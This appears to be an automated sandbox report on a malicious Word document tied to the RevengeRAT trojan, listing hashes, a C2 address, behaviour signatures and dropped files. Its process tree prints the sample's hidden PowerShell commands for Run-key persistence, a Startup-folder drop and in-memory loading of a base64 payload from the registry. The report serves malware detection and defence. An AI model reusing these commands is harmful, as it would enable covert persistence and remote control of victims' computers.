Overview

overview

10

Static

static

8

147f364a78...dc.doc

windows7-x64

10

147f364a78...dc.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    47s
  • max time network
    40s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-10-2024 21:51

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    147f364a78efbe21c664cc3b57b52430a15a2d1856f10e0f4067942e39c9d6dc.doc

  • Size

    54KB

  • MD5

    c50aa75e55eacfd0a85643c81d6962c5

  • SHA1

    3347d3c5b03afcd46ada31639c80174de5eac1df

  • SHA256

    147f364a78efbe21c664cc3b57b52430a15a2d1856f10e0f4067942e39c9d6dc

  • SHA512

    9e8bcac38eeab864ad914afa1ac81fcecc942dfc0bd90ab8bc3e9b720460792c8040133fc1118dc674263636f6ba28dbc69c4c7290bff13e0bf46394774d9694

  • SSDEEP

    768:XRcXUzsZ/e5aO67lghmts3yeibSOFgOK:6X/eG7lghnyDb

Score
10/10
revengeratnyancatrevengeexecutionpersistencetrojan

Malware Config

Extracted

Family

revengerat

Botnet

NyanCatRevenge

C2

54.146.241.16:5222

Mutex

f9796de67e

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RevengeRAT

    Remote-access trojan with a wide range of capabilities.

    trojanrevengerat
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\147f364a78efbe21c664cc3b57b52430a15a2d1856f10e0f4067942e39c9d6dc.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4860
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\avg.js"
      2⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2300
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'cocacola' -value 'C:\Users\Admin\AppData\Roaming\avg.js' -PropertyType String -Force;"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4520
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\avg.js',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Roaming\avg.js'))"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3680
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;$_b=$_b.replace('~','0');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2504

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
    Filesize

    53KB

    MD5

    a26df49623eff12a70a93f649776dab7

    SHA1

    efb53bd0df3ac34bd119adf8788127ad57e53803

    SHA256

    4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

    SHA512

    e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\TCDD656.tmp\sist02.xsl
    Filesize

    245KB

    MD5

    f883b260a8d67082ea895c14bf56dd56

    SHA1

    7954565c1f243d46ad3b1e2f1baf3281451fc14b

    SHA256

    ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

    SHA512

    d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dawhcwvy.d45.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
    Filesize

    2B

    MD5

    f3b25701fe362ec84616a93a45ce9998

    SHA1

    d62636d8caec13f04e28442a0a6fa1afeb024bbb

    SHA256

    b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

    SHA512

    98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
    Filesize

    1KB

    MD5

    3cfdcc9e91ff284a74044d8d0875f4e4

    SHA1

    66802bd3fc0047f3ef4e1abef2dc889eeede5c5e

    SHA256

    012a8fa7ceecbc90a2f3411f1945c2adde0c72765e78f22835eda5cf3b5e0943

    SHA512

    2444eda47faf166b52dd6bfaa29831c842cd418d9639097a4495ff53ded5aa50c482e06b080c4dc9870fa8a16aac6f84443b168fcfaec81cd84b3dcc1a28373d

    Download Submit

  • C:\Users\Admin\AppData\Roaming\avg.js
    Filesize

    60KB

    MD5

    4d21175948ef7464aaac5cb6a191e2d9

    SHA1

    8ba376fa81916b44be0c02ce33813d9cd9c9bdaf

    SHA256

    b81e456cf92319440989cbde2b2484e6e11c6acb03ef493ca18e429294a3117f

    SHA512

    cf2b0162c5707c098254189d2db04dd38e0ab9bfdbbefe8b05843275cdcce5f5d19d4a4d24100c836bdc777d8f78ecd72cd7863adf31d0958a80150ae71ab983

    Download Submit

  • memory/2504-117-0x00000127A79E0000-0x00000127A79EA000-memory.dmp

    Filesize

    40KB

    Download

  • memory/3680-118-0x0000014E31BB0000-0x0000014E31C26000-memory.dmp

    Filesize

    472KB

    Download

  • memory/4520-115-0x000002AA77EB0000-0x000002AA77EF4000-memory.dmp

    Filesize

    272KB

    Download

  • memory/4520-110-0x000002AA77E30000-0x000002AA77E52000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4860-11-0x00007FFA00DF0000-0x00007FFA00FE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4860-10-0x00007FF9BEE10000-0x00007FF9BEE20000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4860-12-0x00007FFA00DF0000-0x00007FFA00FE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4860-19-0x00007FFA00DF0000-0x00007FFA00FE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4860-18-0x00007FFA00DF0000-0x00007FFA00FE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4860-20-0x00007FFA00DF0000-0x00007FFA00FE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4860-17-0x00007FFA00DF0000-0x00007FFA00FE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4860-16-0x00007FFA00DF0000-0x00007FFA00FE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4860-15-0x00007FFA00DF0000-0x00007FFA00FE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4860-14-0x00007FF9BEE10000-0x00007FF9BEE20000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4860-9-0x00007FFA00DF0000-0x00007FFA00FE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4860-43-0x00007FFA00DF0000-0x00007FFA00FE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4860-49-0x00007FFA00DF0000-0x00007FFA00FE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4860-50-0x00007FFA00DF0000-0x00007FFA00FE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4860-0-0x00007FF9C0E70000-0x00007FF9C0E80000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4860-13-0x00007FFA00DF0000-0x00007FFA00FE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4860-7-0x00007FF9C0E70000-0x00007FF9C0E80000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4860-8-0x00007FFA00DF0000-0x00007FFA00FE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4860-5-0x00007FFA00DF0000-0x00007FFA00FE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4860-6-0x00007FFA00DF0000-0x00007FFA00FE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4860-2-0x00007FF9C0E70000-0x00007FF9C0E80000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4860-125-0x00007FFA00DF0000-0x00007FFA00FE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4860-127-0x00007FFA00DF0000-0x00007FFA00FE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4860-126-0x00007FFA00E8D000-0x00007FFA00E8E000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4860-128-0x00007FFA00DF0000-0x00007FFA00FE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4860-129-0x00007FFA00DF0000-0x00007FFA00FE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4860-130-0x00007FFA00DF0000-0x00007FFA00FE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4860-4-0x00007FF9C0E70000-0x00007FF9C0E80000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4860-3-0x00007FF9C0E70000-0x00007FF9C0E80000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4860-1-0x00007FFA00E8D000-0x00007FFA00E8E000-memory.dmp

    Filesize

    4KB

    Download